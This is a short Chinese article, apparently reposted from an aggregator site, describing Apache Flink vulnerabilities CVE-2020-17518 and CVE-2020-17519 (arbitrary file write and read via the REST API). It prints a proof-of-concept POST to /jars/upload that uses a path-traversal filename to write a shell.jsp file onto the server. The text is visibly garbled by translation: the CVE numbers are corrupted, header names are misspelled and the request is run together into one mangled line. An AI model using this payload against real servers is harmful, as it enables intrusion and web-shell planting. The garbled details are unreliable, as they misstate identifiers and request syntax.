今天跟大家聊聊Apache Flink POC漏洞CVE-2020-17518/17519的实例分析,可能很多人不太了解。为了让大家更好的了解,边肖为大家总结了以下内容,希望大家能从这篇文章中有所收获。
CVE-2020-175183360文件写入
使用REST API,攻击者可以修改HTTP头并将上传的文件写入本地文件系统的任何位置(Flink 1.5.1进程可以访问)
CVE-2020-175193360文件读取
Apache Flink 1.11.0允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(可由JobManager进程访问)。
概念验证:
POST/jars/upload HTTP/1.1host : IP :8081 Accept-encoging : gzip,pinaceaccept : */* Accept-language : enUser-agent : Mozilla/5.0(Windows NT 10.0;Win64x64)applebwebkit/537.36(KHTML,像Gecko)Chrome/87 . 0 . 4280 . 88 Safari/537.36 connection : closeContent-type : multipart/form-data;boundary=-webkitformboundaryoz89r 6 ycontent-length : 189-webkitformboundaryoz8mknrrs89r 6 ycontent-disposition :表单-数据;name=' jarfile文件名='././././././etc/shell . JSP ' success-webkitformboundaryoz8 meknrso 89 r6y-
看完以上内容,你对Apache Flink POC漏洞CVE-2020-17518/17519的样本分析有更好的理解吗?如果您想了解更多知识或相关内容,请关注行业资讯频道,感谢您的支持。
内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/155656.html